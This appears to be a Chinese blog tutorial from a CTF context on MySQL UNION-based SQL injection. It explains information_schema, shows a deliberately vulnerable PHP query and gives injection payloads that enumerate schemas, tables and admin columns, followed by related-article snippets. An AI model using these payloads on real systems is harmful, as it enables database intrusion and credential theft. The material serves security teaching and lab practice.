mysql注入ctf_Web安全原理剖析-SQL Injection

最新推荐文章于 2022-11-09 00:12:45 发布
最新推荐文章于 2022-11-09 00:12:45 发布
阅读量1.2k 收藏 4
点赞数
文章标签: mysql注入ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30069113/article/details/113614773
版权

0x01 预备知识

Mysql的相关知识

在MySQL 5.0之后,MySQL默认在数据库中存放一个”information_schema”的库,比较重要的三个表名:SCHEMATA、TABLES以及COLUMNS。

information_schema.schemata:存储了所有库名。

441237b5bad7dc95eb9f134e8137fdf5.pngstruct

该表中记录库名的字段为:SCHEMA_NAME,因此可以如下注入:

-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

information_schema.tables:存储了所有表名。

02bc1abe8d687543a9a503eddcdc140b.pngquery

423d5eb5d928d93a39755ba90f1cabe7.pngstruct

该表中记录库名的字段为:TABLE_SCHEMA,记录表名的字段为:TABLE_NAME

-1' union select 1,group_concat(TABLE_NAME),3 from information_schema.tables where TABLE_SCHEMA = 'ejucms' --+

information_schema.columns:存储了所有字段名。

5d827860fcc84fcac47df0d62751814e.pngquery

29ce488fbd41affe6fa8c3c9edb3b57c.pngstruct

该表中记录库名的字段为:TABLE_SCHEMA,记录表名的字段为:TABLE_NAME,记录字段名的字段为:COLUMN_NAME

-1' union select 1,group_concat(COLUMN_NAME),3 from information_schema.columss where TABLE_NAME = 'eju_admin' --+

关于查询语句

无条件

select column_name from database_name.table_name;

一个条件

select column_name from database_name.table_name where column_name='';

两个条件

select column_name from database_name.table_name where column_name='' and column_name ='' ;

limit第一个参数为第几条记录(从0开始),第二个参数为取几条记录

limit 0,1

database():当前库

version():当前MySQL版本

user():当前MySQL用户

注释符

# or 空格 or /**/

内联注释:/*! code*/

index.php?id=-1/*! UNION*//*! SELECT*/1,2,3

union联合查询:前面查询结果为空集,后面的查询结果才能显示出来。

Union Injection

下面的代码可以看到,输出了字段内容以及并没有进行任何检测过滤,并且$id属于int型,后面也没有什么需要注释的地方。

$conn = mysqli_connect("localhost","root","root","security");

if(mysqli_connect_errno()){

echo "ERROR:".mysqli_connect_errno;

die();

}

$id = @$_GET['id'];

$result = mysqli_query($conn,"select * from users where `id`=".$id);

$row = mysqli_fetch_array($result);

echo $row['username'].":".$row['password'];

echo "
";

?>

看到输出了username以及password,因此就是普通的注入。

黑盒测试的话,这个一测就测的出来。

首先用 and 1=1 和 and 1=2两个永真及永假条件判断是否存在sql注入

9b5e912bb91a0b44add0b87956cdd26a.png

b3052cf9ab52528616658a1abcf07ee8.png

可以判断存在sql注入。

daae9ed1e99ea1f42eac47d4f95e41cd.png

166fce1aad44e19841aadff4d261ce0a.png

判断有三个字段。

71a8404b1d293c5487623fc14460b079.png

输出的字段为2,3.

05e3efdfba140d34e5430f123f8ae496.png

1e894f957d2c99fd4273853db53a0c7c.png

可打印出所有的库名并且当前库为security.

0e006fccd43ff77989b70468f47fa517.png

爆出当前库的表名.

77a685d26ad369c808e6637cc473661b.png

看到这里,其实爆出来好多库名,因为users这张表好几个库中都有.

最低0.47元/天 解锁文章
cici xiang
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 638
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
mysql注入ctf_CTFSQL注入详解
weixin_29117805的博客
01-20 896
前言:最近打算玩一下CTF,玩过CTF的都知道SQL注入CTF中最重要的题型。但是。。。。。。。。。很多大佬的WP都是一阵操作猛如虎。很多都不带解释的(大佬觉得简单所以就不解释了=_= =_= =_=)。所以这几天一直都在看关于SQL注入的文章,一直也不理解SQL注入原理。今天刚好看到了一篇文章,自己也跟着那个博主的思路总结一下,对SQL注入有了一个大概的的理解。写这篇博文一是希望加深自己对S...
mysql注入ctf_CTF考点总结-sql注入
weixin_36488760的博客
01-28 1083
整理下sql相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码当前用户:select user()数据库版本:select version() , select @@versi...
BUUctfweb:[BJDCTF2020]Easy MD5
羽的博客
07-12 314
搞得像个SQL注入一样,忍不住'#了一下。 后面就不太找得到突破点了。 看来下WP结果意想不到。 Hint: select * from 'admin' where password=md5($pass,true) 响应头里面有个这个。 查查md5函数 md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。可能会返回这样子的字符串:'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1和SQL语句拼接就可以是: select * from ‘a...
ctfshow-WEB-web9( MD5加密漏洞绕过)
热门推荐
wangyuxiang946的博客
09-05 1万+
ctf.show WEB模块第9关是一个SQL注入漏洞, SQL中使用MD5进行加密, 推荐使用MD5加密漏洞绕过 进去以后就是一个登录界面, 盲猜是个SQL注入漏洞 首先, 我们访问根目录下的 robots.txt 文件 robots.txt是一个文本文件,同时也是一个协议,规定了爬虫访问的规则( 哪些文件可以爬取,哪些文件不可以爬取) 从robots.txt文件的内容中可以发现, 作者给了提示, index.phps文件应该就是此关卡的源码文件 接下来...
mysql&&sql注入+ctf+web安全
最新发布
10-08
mysql&&sql注入+ctf+web安全
安全建设」CTF_中的密码学 - 渗透测试.zip
12-04
安全建设」CTF_中的密码学 - 渗透测试 漏洞挖掘 安全认证 安全研究 安全培训 企业安全
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF web安全经典例题讲解
10-22
综上所述,"CTF web安全经典例题讲解"是一个全面覆盖Web安全关键领域的学习资源,包括SQL注入的检测与防御、密码学基础应用、文件上传漏洞的识别与修复、Web权限提升的防范以及抓包改包技巧的实践。对于希望在网络...
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个文件中包含了大部分程序逻辑 再使用AXMLPrinter2.jar对AndroidManifest.xml进行解包 2.分析文件 使用JD-GUI分析jar文件 找到MainActivity.clss,因为正常情况下MainActivity是app加载的第一个页面。 可以看到程序获取两个编辑框的内容,通过Intent机制调用S
SQL注入-md5加密参数漏洞(CTF例题)
bin789456的博客
08-29 1540
漏洞成因 php中的md5函数有一个可选参数,如果开发者写查询数据库函数时使用了这个参数,或者在数据存储时是md5后的字符串形式存储,都有可能产生这个漏洞。 利用方法 md5看似是非常强加密措施,但是一旦没有返回我们常见的16进制数,返回了二进制原始输出格式,在浏览器编码的作用下就会编码成为奇怪的字符串(对于二进制一般都会编码)。 我们使用md5碰撞,一旦在这些奇怪的字符串中碰撞出了可以进行SQL注入的特殊字符串,那么就可以越过登录了。 下面是参考资料的英文原版: The trick: Raw MD5 h
buuctfweb刷题wp详解及知识整理----【护网杯】easy_tornado(模板注入+md5
weixin_45784586的博客
03-01 630
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 点击一下/welcome.txt 回显 render 而且url处有异常 同理测试其他选项 通过猜测可知filehash的值就是/hint.txt中的算法得到的 从而 我们只要得到cookie_secret的值即可通过脚本的到于/flllll...
CTF-HTTP头注入漏洞测试(X-Forwarded-for)
asd158923328的博客
08-21 2231
根据题意 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 进入环境,打开跳转页 打开Burp Suite ,抓包,右键发送给repeater,填入X-Forwarded-For,首先判断是否可注入。 order by 判断表数量,从1开始依次试试,最后发现是4 union select 1,2...
CTF—HTTP命令注入
IT小学子的博客
05-04 457
主机:192.168.32.152   靶机:192.168.32.167 首先nmap,nikto -host,dirb 探测 robots.txt目录下 在/nothing目录中,查看源码发现pass 在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开 然后发现mp3文件其实是text文本,cat打开 发现一段文字还有个url,打开url,用户...
http头注入
梁顿的专栏
10-10 1100
https://zhuanlan.zhihu.com/p/27553821
CTF web题总结--http header 修改、cookie注入
bob的博客
08-31 5822
内网访问,X-Forward-For:127.0.0.1 Accept-Language User-Agent status=login
实验 | Http头注入
qq_42646885的博客
07-11 377
题目:http 头注入 描述:换个浏览器试试? 实验步骤: 打开解题链接,看到页面是一个链接一个提示:chage header。 点击link链接,用burpsuite抓包。根据提示,尝试下User-Agent注入。 给User-Agent尝试添加了一些字符都没什么反应。提示是http头注入,再试下其他的头。 尝试下Referer,发现输入字符" ' "后,页面爆SQL语法错...
Web方向】 2-1 HTTP头部注入 案例篇
wanderer的博客
11-09 185
Web方向】 ctf-http头部注入案例
web安全入门ppt课件.ppt
11-16
"Web安全入门PPT课件涵盖了Web安全的基础知识,包括Web的B/S架构,Web程序的执行过程,以及重点讲解了Web漏洞中的SQL注入问题。" Web安全是一个重要的领域,对于任何涉及Web应用程序开发、维护或管理的人来说都是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值